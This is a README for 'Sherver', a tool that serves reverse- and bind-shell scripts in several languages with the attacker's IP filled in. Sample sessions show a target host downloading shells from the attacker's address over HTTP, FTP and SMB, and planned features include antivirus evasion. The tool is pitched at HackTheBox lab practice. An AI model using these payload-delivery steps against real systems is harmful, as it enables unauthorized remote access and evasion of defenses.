## Sherver

Sherver is an all-in-one server to quickly host Reverse Shell scripts. It will attempt to determine your VPN IP address and create appropriate scripts in varying languages, all available to download via FTP, HTTP, and SMB at the same time. 

When your IP changes the next time you log in to HackTheBox, all shells hosted from Sherver will automatically have the correct IP. No longer will you have to update the IP every time, or miss a call-back because of a stale config. 

```bash
vandal@kali-cloud:~$ sherver

    _____ __  ____________ _    ____________
   / ___// / / / ____/ __ \ |  / / ____/ __ \
   \__ \/ /_/ / __/ / /_/ / | / / __/ / /_/ /
  ___/ / __  / /___/ _, _/| |/ / /___/ _, _/
 /____/_/ /_/_____/_/ |_| |___/_____/_/ |_|

                           -VandalTheGrey

LHOST:  10.10.14.2
LPORT:  4444

FTP Server:     0.0.0.0:2121
HTTP Server:    0.0.0.0:8000
SMB Server:     0.0.0.0:445
```

### Supported Languages

Reverse Shells:
- Python2
- Python3
- PHP
- Perl
- Perl (CGI)
- PowerShell

Bind Shells:
 - Python2/3

```
shells/shell.pl.cgi.j2
shells/shell.py3.j2
shells/shell.py.j2
shells/shell.ps1.j2
shells/shell-all.php.j2
shells/shell.pl.j2
shells/shell.php.j2
shells/bind/shell.py.j2
```

### How it Works

By utilizing the power of Jinja Templates, Sherver can be used with almost any payload script.  It will traverse the following directories, and for each render any `*.j2` files replacing `lhost` and `lport`, and copy any other remaining files into a temporary directory. 

- `<REPO/INSTALL DIR>/shells/`
- `/etc/sherver/shells/`
- `/home/<USER>/.local/sherver/shells/`
- Optionally, current directory

Any files in a later directory will overwrite those from an earlier, meaning you can customize any of the supplied shells with your own modifications. 

You can also choose to include files from your current directory, either the top level or recursively. NOTE: This iteration of Sherver copies all templates/files into a single directory to serve them from; *Any LARGE files will also be copied if found*. 

Each file is (mostly) named as `shell.[LANGUAGE_EXTENSION]`. For example, Python2: `shell.py`, Python3: `shell.py3`, PHP: `shell.php`, etc. The intention is to allow quick decisions about which language to be determined quickly and easily. This is however, only a naming convention, and one which can be personalized. 

When started, the shells can be fetched via HTTP:
```bash
dan_smith@shared:/tmp$ wget -q http://10.10.14.2:8000/shell.php
--2022-11-21 13:21:45--  http://10.10.14.2:8000/shell.php
Connecting to 10.10.14.2:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 125 [application/octet-stream]
Saving to: ‘shell.php’

shell.py3         100%[==========>]     125  --.-KB/s    in 0s

2022-11-21 13:21:45 (17.6 MB/s) - ‘shell.php’ saved [125/125]
```

Via FTP:
```bash
dan_smith@shared:/tmp$ ftp -P 2121 10.10.14.2
Trying 10.10.14.2:2121 ...
Connected to 10.10.14.2.
220 pyftpdlib 1.5.7 ready.
Name (10.10.14.2:dan_smith): anonymous
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get shell.py
local: shell.py remote: shell.py
229 Entering extended passive mode (|||45871|).
125 Data connection already open. Transfer starting.
100% |************************|   211        3.72 MiB/s    00:00 ETA
226 Transfer complete.
211 bytes received in 00:00 (1.14 MiB/s)
ftp>
```

Or via SMB:
```
C:\Temp>copy \\10.10.14.2\shells\shells.ps1 .
1 file(s) copied.

C:\Temp> 
```

### Install

Installation is pretty straightforward. Just need to clone, install pip requirements, and if you'd like, symlink into PATH for easier use: 

```bash
vandal@kali-cloud:/opt$ git clone https://gitlab.com/vandalTheGrey/sherver.git
vandal@kali-cloud:/opt$ cd sherver/
vandal@kali-cloud:/opt/sherver$ python -m pip install -r requirements.txt
vandal@kali-cloud:/opt/sherver$ sudo ln -s /opt/sherver/sherver.py /usr/local/bin/sherver
```

### Future Enhancements

- File watch on any source dirs; update scripts which are served if templates are modified.
- Multi-step compilation; i.e. generating a PowerShell payload and base64 encoding it. 
- Randomization of final scripts. Generating a random key on initiailization, and a de-encoding stub to head of payload?
  - AV-evasion randomization. 
- Config file support
  - Only running certain servers by default
  - Use differnet ports for `lhost` or servers
